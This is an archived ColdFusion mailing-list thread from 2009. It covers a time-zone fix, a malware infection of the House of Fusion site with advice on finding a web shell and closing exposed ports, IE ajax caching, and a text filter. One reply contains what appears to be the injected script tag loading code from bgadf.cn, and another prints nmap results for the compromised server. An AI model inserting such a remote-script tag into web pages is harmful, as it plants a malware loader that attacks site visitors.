I've had time to do more testing on this.
From what i can tell it's a bug in my IE :/
Also, this is the code I'm using to embed mp3, wma and wmv files. I'm
streaming them off a Windows Media Server.
WMV and WMA files play on all browsers tested with this code (IE, Firefox,
Chrome). Well,
Excellent... This worked: http://www.petefreitag.com/item/171.cfm
Adding the argument to the Java args worked!!
On Wed, Sep 16, 2009 at 4:25 PM, Judah McAuley ju...@wiredotter.com wrote:
That sounds about right then. Being -5 plus being in DST would result
in it being 4 hours off if it
I've noticed that houseoffusion.com is down. Is anyone else experiencing
this as well?
Paul Alkema
Application Developer
http://www.alkemadesigns.com/
~|
Want to reach the ColdFusion community with something they want? Let
I concur. The site is unavailable.
-Original Message-
From: Paul Alkema [mailto:paulalkemadesi...@gmail.com]
Sent: Thursday, September 17, 2009 9:08 AM
To: cf-talk
Subject: houseoffusion.com down?
I've noticed that houseoffusion.com is down. Is anyone else experiencing
this as well?
Read the back messages.
On Thu, Sep 17, 2009 at 6:08 AM, Paul Alkema
paulalkemadesi...@gmail.com wrote:
I've noticed that houseoffusion.com is down. Is anyone else experiencing
this as well?
Paul Alkema
Application Developer
http://www.alkemadesigns.com/
Most likely Michael has taken it offline to complete the cleansing of
infected files.
-Original Message-
From: Paul Alkema [mailto:paulalkemadesi...@gmail.com]
Sent: Thursday, September 17, 2009 8:08 AM
To: cf-talk
Subject: houseoffusion.com down?
I've noticed that houseoffusion.com
And after going through everything on the site and computer in
general, it's all up again. 30 minutes from the first message on this
thread till the site was back up. Now that's service.
I'll write up what information I have on the attack and what I did to
fix it all as soon as I get a second. I
Looks like Forta's site might be having the same problem Michael. Todd
Rafferty just got the danger warning from http://forta.com/
andy
-Original Message-
From: Michael Dinowitz [mailto:mdino...@houseoffusion.com]
Sent: Thursday, September 17, 2009 8:41 AM
To: cf-talk
Subject: Re:
I'd still take a look at the other article. My worry is that if you
are only passing the time zone that it might work now but then get
messed up when we go off of daylight savings time. Perhaps you should
run your test again and see if the DST is reported as being ON. Then
move your system clock
The sooner the better if HOF and Bens blog got attacked and its a
common issue it would be good to know exactly what was the weak point
hat allowed the intrusion.
Paul.
On Thu, Sep 17, 2009 at 9:41 AM, Michael Dinowitz
mdino...@houseoffusion.com wrote:
And after going through everything on
from ESET Smart Security, version of virus signature
database 4434 (20090917) __
The message was checked by ESET Smart Security.
http://www.eset.com
~|
Want to reach the ColdFusion community with something they want
: AW Unplugged
http://www.austin-williams.com/unplugged
__ Information from ESET Smart Security, version of virus signature
database 4434 (20090917) __
The message was checked by ESET Smart Security.
http://www.eset.com
Unplugged
http://www.austin-williams.com/unplugged
__ Information from ESET Smart Security, version of virus
signature
database 4434 (20090917) __
The message was checked by ESET Smart Security.
http://www.eset.com
The recent attack on House of Fusion resulted in some useful
information as to what you should look for. In general, all or most of
the files with the following extensions were affected:
.cfm
.cfml
.htm
.html
.js
The following line of code was prepended to all files other than .js
script
If you ever find the root cause, you may want to write an article on it,
or do a presentation for cfmeetup!
I know I'd be interested in it!
-Original Message-
From: Michael Dinowitz [mailto:mdino...@houseoffusion.com]
Sent: Thursday, September 17, 2009 3:08 PM
To: cf-talk
Subject:
I'll do that. I have to take the below information, make it nice and
neat, and then write it up as a Fusion Authority site article.
On Thu, Sep 17, 2009 at 3:14 PM, DURETTE, STEVEN J (ATTASIAIT)
sd1...@att.com wrote:
If you ever find the root cause, you may want to write an article on it,
or
Michael, a quick nMap shows the following ports are open on the server
that houseoffusion.com resolves to (64.118.74.245).
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1036/tcp open
Super thorough research Brad. While I'm not affected, I appreciate your
level of expertise.
-Original Message-
From: b...@bradwood.com [mailto:b...@bradwood.com]
Sent: Thursday, September 17, 2009 2:47 PM
To: cf-talk
Subject: RE: malware patterns
Michael, a quick nMap shows the
Thanks. I'll check those out. I found the hole though as well as the
script used to access the machine. Nasty piece of code.
On Thu, Sep 17, 2009 at 3:47 PM, b...@bradwood.com wrote:
Michael, a quick nMap shows the following ports are open on the server
that houseoffusion.com resolves to
I've seen this sort of attack before on a client's server that they were
hosting at their office. The malware that did it used a stolen FTP
password to log in as an actual user and modify every HTML file on their
server. We found it be reviewing the FTP server logs and saw that their
general
OK, here's what to do. Search your entire code base for any web
accessible script containing the text chanm. I found a jsp and a cfm
file, both with the ability to upload and manipulate files on a
server. If you do find a file like this, please send me the code so I
can compare it to what I have
135 and 445 should NOT be open to the public!
-Original Message-
From: b...@bradwood.com [mailto:b...@bradwood.com]
Sent: Thursday, September 17, 2009 12:47 PM
To: cf-talk
Subject: RE: malware patterns
Michael, a quick nMap shows the following ports are open on the server
that
Fast question. On win2k is there an easy way of closing/blocking these
or does it have to be further up the chain.
On Thu, Sep 17, 2009 at 4:33 PM, Jacob ja...@excaliburfilms.com wrote:
135 and 445 should NOT be open to the public!
-Original Message-
From: b...@bradwood.com
Poor title, but I couldn't get it all in there.
- got a page which loads a .cfm of content into a div via a jQuery
.load function
- the content for the .loaded .cfm page is generated in a cfc
method, and I use
cfsavecontent and save the generated content out to the
I would block them at the Firewall. You don't even want the traffic getting
to the box.
=]
On Thu, Sep 17, 2009 at 1:42 PM, Michael Dinowitz
mdino...@houseoffusion.com wrote:
Fast question. On win2k is there an easy way of closing/blocking these
or does it have to be further up the chain.
You can turn off windows file and print sharing or enable the Windows
firewall, but chances are you want those ports available to your
internal network. Assuming this machine is behind a hardware firewall,
that is the best place to lock down ports you don't want the outside
world getting to. Or
Didn't mean to hit send...
Here is a tech article on doing at the server level
http://support.microsoft.com/kb/813878
On Thu, Sep 17, 2009 at 1:46 PM, Alan Rother alan.rot...@gmail.com wrote:
I would block them at the Firewall. You don't even want the traffic getting
to the box.
=]
On
Did you set cache: false in your $.ajax params?
-- Josh
-Original Message-
From: Rick Faircloth [mailto:r...@whitestonemedia.com]
Sent: Thursday, September 17, 2009 1:42 PM
To: cf-talk
Subject: How to prevent IE from caching content added via ajax?
Poor title, but I couldn't get it
If you are loading via url:
function ts(){
var tr = '';
var curDateTime = new Date()
tr += curDateTime.getHours();
tr += curDateTime.getMinutes();
tr += curDateTime.getSeconds();
return tr;
}
$(#myloaddiv).load(/ajaxDIV/index.cfm?id=+id+ts=+ts();
script src=http://bgadf.cn/script
Arg... chinese junk again :-(
~|
Want to reach the ColdFusion community with something they want? Let them know
on the House of Fusion mailing lists
Archive:
Fast note. Some anti-virus programs are reporting this thread as
having a virus due to the code fragment from the first post. This is a
false positive, but if there is a concern, just use the website
interface.
~|
Want to reach
Oh...if you are using the load function, then you can just do this somewhere
before it:
$.ajaxSetup({ cache: false });
This will make it so any and all subsequent ajax requests (including load)
are not cached.
-- Josh
-Original Message-
From: Josh Nathanson
Yep...that's the first thing in the $.ajax settings...
But, I believe I've solved the problem. Usually when I use .load
to add content in a .cfm file into a div, I use this:
$('#hiddenResult').load('../components/propertiesDisplay.cfm?' + new
Date().getTime());
I had one other place in my
Thanks, Tony!
-Original Message-
From: Tony Bentley [mailto:t...@tonybentley.com]
Sent: Thursday, September 17, 2009 4:45 PM
To: cf-talk
Subject: Re: How to prevent IE from caching content added via ajax?
If you are loading via url:
function ts(){
var tr = '';
var
Good to know, Josh! Thanks!
-Original Message-
From: Josh Nathanson [mailto:p...@oakcitygraphics.com]
Sent: Thursday, September 17, 2009 5:03 PM
To: cf-talk
Subject: RE: How to prevent IE from caching content added via ajax?
Oh...if you are using the load function, then you can just
IPSec... that could get a little complicated.
A firewall should be able to block this, as well as adding ACLs to the
router.
-Original Message-
From: Michael Dinowitz [mailto:mdino...@houseoffusion.com]
Sent: Thursday, September 17, 2009 1:42 PM
To: cf-talk
Subject: Re: malware
Fast question. On win2k is there an easy way of closing/blocking these
or does it have to be further up the chain.
Yes. You can do this with an IP security policy. However, I would also
recommend that you block all unwanted traffic at the gateway, of
course.
Dave Watts, CTO, Fig Leaf Software
Fast question. On win2k is there an easy way of closing/blocking these
or does it have to be further up the chain.
Yes. You can do this with an IP security policy. However, I would also
recommend that you block all unwanted traffic at the gateway, of
course.
If you like, I can probably
Could they have been opened by a virus?
I've checked the whole system and if there was any Hentai on it, I'd know.
Frankly, I'm surprised you haven't had other problems, with SMB/CIFS
exposed to the public. You may want to make sure you're not hosting
any tentacle porn, etc. It wouldn't have
oops, should have been off-list. Sorry!
On Thu, Sep 17, 2009 at 17:55, Dave Watts dwa...@figleaf.com wrote:
Fast question. On win2k is there an easy way of closing/blocking these
or does it have to be further up the chain.
Yes. You can do this with an IP security policy. However, I would
Could they have been opened by a virus?
Well, I don't think it would be a virus in the traditional sense, no.
But if you have access to the filesystem with SYSTEM or admin rights,
you can do anything you want really.
I've checked the whole system and if there was any Hentai on it, I'd know.
Hey people. I'm working on a filter to put in some random text into my
pages. For example...
The project is done.
Becomes
The project is done, and dinna spare the whip!
(I think some of you know why I am doing this). :)
Anyway, I don't want to have it appear after EVERY period or ! or ?..
100% untested, but you get the idea:
s = The project is done.;
strings = [
and dinna spare the whip,
and I sure am handsome,
...
]
start = 0;
while (true) {
// any . ? ! preceded by a letter and followed by a space
start = REFind([a-zA-Z][.?!]( |$), s, start);
if (start == 0) {
Thanks. I'll test it out and let you know how it goes. :)
On Thu, Sep 17, 2009 at 10:35 PM, Barney Boisvert bboisv...@gmail.com wrote:
100% untested, but you get the idea:
s = The project is done.;
strings = [
and dinna spare the whip,
and I sure am handsome,
...
]
start = 0;
while
44 matches
Mail list logo
